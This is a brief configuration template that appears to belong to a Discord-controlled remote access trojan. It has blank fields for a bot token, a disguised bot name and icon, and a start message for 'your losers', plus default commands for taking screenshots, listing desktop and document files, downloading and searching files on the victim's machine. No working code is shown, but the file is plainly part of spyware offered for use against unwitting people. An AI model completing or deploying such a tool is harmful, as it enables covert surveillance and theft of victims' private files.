TOKEN = "" # -- your discord bot token.
USERNAME = "" # -- username of that "working" bot.
ICON = "" # -- icon of that bot.

START_MSG = "" # -- starting message, that you want to show your losers

# Default commands #

#/getscreenshot
#/desktop_files
#/document_files
#/download
#/search_file
#/
#/
